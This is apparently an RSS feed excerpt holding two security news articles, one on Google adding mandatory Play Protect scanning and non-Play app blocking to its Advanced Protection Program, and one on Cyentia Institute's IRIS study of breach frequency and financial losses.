The Advanced Protection Program is Google’s upgraded security program for higher risk users, such as journalists, activists, and executives, and it includes a number of extra defensive measures. The APP includes the use of hardware security keys for two-factor authentication, better protection against phishing, and additional steps to verify users’ identities during the account recovery process. The program is open to anyone, but it is mainly focused on those higher-risk users.

Today, Google has added several new protections to the program, including the mandatory use of the Play Protect app-scanning capability on any Android device that’s attached to a Google account enrolled in the Advanced Protection Program. Play Protect is the behind-the-scenes system that Google uses to find and remove malicious apps from Android devices. It scans the apps on a devices on a regular basis, looking for known malicious apps or apps that have hidden or potentially harmful features or capabilities. The system is optional for most users, but Google is changing that for people in the APP.

“To ensure that people enrolled in our Advanced Protection Program benefit from the added security that Google Play Protect provides, we’re now automatically turning it on for all devices with a Google Account enrolled in Advanced Protection and will require that it remain enabled,” Roman Kirillov, engineering manager for Android security and privacy, said.

In addition to automatically enabling app scanning, Google also is changing which apps can be installed on devices with an Advanced Protection Program account enabled. Unlike iOS, Android typically allows people to install apps from third-party sources outside of the Play Store. That gives people added flexibility and freedom, but it also adds an element of risk, as apps in those third-party stores typically aren’t subject to the same testing and security review that Google performs before approving apps in the Play Store.

“Advanced Protection is committed to keeping harmful apps off of enrolled users’ devices. All apps on the Google Play Store undergo rigorous testing, but apps outside of Google Play can potentially pose a risk to users’ devices. As an added protection, we’re now blocking the majority of these non-Play apps from being installed on any devices with a Google Account enrolled in Advanced Protection,” Kirillov said.

“You can still install non-Play apps through app stores that were pre-installed by the device manufacturer and through Android Debug Bridge. Any apps that you’ve already installed from sources outside of Google Play will not be removed and can still be updated.”

The changes to the Advanced Protection Program begin today, and Google is planning to roll out some additional anti-malware tools in Chrome later this year, as well.

<![CDATA[Use Data, Not Magical Thinking]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/use-data-not-magical-thinking https://duo.com/decipher/use-data-not-magical-thinking Thu, 19 Mar 2020 00:00:00 -0400

It is notoriously difficult to quantify security impact and risk—such as estimating how much money would be saved by deploying a certain security control, or the financial impact in case of a breach or attack. The latest research from Cyentia Institute provides security leaders with a solid starting point to answer some of these questions.

Security leaders need to be able to quantify security risk and rank it in relation to other risks in order to make informed decisions. In the Information Risk Insights Study (IRIS), Cyentia researchers analyzed the dataset spanning tens of thousands of security events over the last decade provided by insurance data provider Advisen to develop models which risk managers can use to make informed decisions regarding their cyber risk, said David Severski, a senior data scientist at Cyentia.

"We're never going to have perfect information, but we can use information that we have available to make better decisions and not just a finger-in-the-wind type of analysis," said Severski.

Cyentia analyzed organizational risk factors across multiple dimensions, including Fortune 1000 rankings, industry sector, market share, organization size, and annual revenue. The dataset includes both headline-grabbing major incidents and smaller, minor, less costly breaches that don't need to be disclosed and aren't "material enough for annual reports." The advantage of having such a large dataset is that organizations can use industry-tailored models to begin their conversations about the frequency and financial impact of incidents, Severski said. It is also a helpful way to compare an organization’s level of risk with industry peers.

Estimating Breach Costs

Financial losses as a result of a security incident typically run about $200,000, according to the IRIS report. However, 10 percent of breaches exceeded $20 million in losses. This is why IRIS also grouped the datapoints to determine what losses looked like for a "typical" event and an "extreme" event. A large organization experiencing a "typical" security incident should expect losses of about $292,000, while a small-to-medium-business would see about $24,000.

Many security leaders rely on a “cost per record” metric in order to estimate losses after a breach. Severiski called this practice “flat-out harmful,” as it can result in $1.7 trillion of error due to overestimating and underestimating losses. (The calculation for this can be found in IRIS, Figure 14)

It is logical that total losses would correlate with the size of the breach, or the number of records compromised, but the data of known incidents and the losses reported for those incidents show that "losses increase by some percentage as the records affected increase exponentially," the IRIS report said. Larger breaches do cost more, but "but it’s definitely not a linear relationship," the report's authors wrote.

As part of the analysis, Severski took the each known event in the dataset and calculated the "cost-per-record" value. It turns out cost-per-record appear to be higher for smaller breaches. At a certain point, the economies of scale, the idea that the per-unit cost of something declines when there is enough of that something, kick in and the cost per record drops to mere pennies for large events. About a quarter of the cases cost $2,5000 per record, which is far more than the $150 figure commonly used in the industry calculations. The ransomware attacks against vulnerable MongoDB databases in 2017 came out to $0.0000003 per record in this model.

A single cost-per-record metric simply doesn’t work and shouldn’t be used," Severski wrote in the report. "It underestimates the cost of smaller events and (vastly) overestimates large events.

The point is not that organizations don't need to think about the number of exposed records in a breach. Instead of multiplying that number against an arbitrary number, Wade Baker, partner and co-founder of Cyentia Institute, recommended treating the figure as a probability. An exposure of 1,000 records have a 6 percent chance of exceeding $10 million in losses. A massive breach of 100 million records, on the other hand, has a greater than 50 percent chance of costing at least $10 million in losses.

The researchers also looked at differences across industries and found that government agencies, information services, financial firms, and educational institutions are the most likely to have a breach or attack. That risk could be higher because of the type of information they have—classified documents, intellectual property, financial details, personnel and customer records—but it could also be the fact that these industry sectors tend to be highly connected, with many systems connected to the network and Internet.

Information services and retail sectors show “abnormally high losses that exceed many other sectors by a factor of 10,” the report found.

Construction, agriculture, and mining are on the lowest end of the curve, and that may be because of the difference in the type of technology they rely on.

Size Matters, With a Twist

Based on Advisen data, researchers found that over 60 percent of Fortune 1000 companies experienced at least one cyber incident over the last decade. This makes sense, since larger corporations make bigger targets and are likely to have bigger incidents—and those are the ones that get reported, Baker said.

The likelihood of a Fortune 1000 firm would have an incident was one in four, or 25 percent, in a given year, according to the IRIS data. The likelihood of a Fortune 1000 company having to deal with 10 or more cyber loss events was 3 percent. When the researchers focused on the larger companies—those in the Fortune 250—the likelihood of experiencing an incident was higher, at 50 percent.

Not being a mega-corporation reduces the likelihood dramatically, since smaller companies have a 2 percent probability they will have even a single event. One in 1000 SMBs are likely to experience a breach or similar incident in a given year, and only one in 100,000 will wind up dealing with 10 incidents.

Yes, size matters, but that doesn’t mean SMBs don’t have to worry about an attack or a breach. The likelihood may be low, but as Severski wrote in the report, “There are a lot of SMBs out there.”

And size also matters when it comes to the financial impact, except in reverse. IRIS analyzed incidents to find the cost of a “typical” event and an “extreme” event—those that impacted 3 percent of the organizations. For the Fortune 1000 company, a “typical” event would lead to $750,000 in losses, and an “extreme” event $77 million. For an SMB, a typical event would be about $79,000 in losses and an extreme event would be $8 million.

In terms of actual dollars, the Fortune 1000 company would be the one harder hit, except they also have more revenue to help absorb the loss. For these large organizations, the incident cost for a typical breach was well under 1 percent of annual revenues, according to the IRIS study. In contrast, the incident cost for a typical breach for the SMB was a quarter of annual revenues.

The Fortune 1000 may be writing a larger check, but the SMB is the one that is going to be hurting.

Risk managers and analysts focusing on the the cost-per-record would miss the actual impact of the breach. A breach doesn’t necessarily have to mean a business-ending event, but it is a material event the organization has to report. Being able to estimate potential impact and assess anticipated costs will prevent organizations from overspending, and to make decisions that are actually in line with their risk tolerance, Baker said. Having a realistic cost for a breach is necessary for better planning, and can help guide response after a breach.

Risk isn’t one-size-fits-all, Baker said. Organizations can make better decisions about the risks they face once they take into account factors more than just the size of the incident.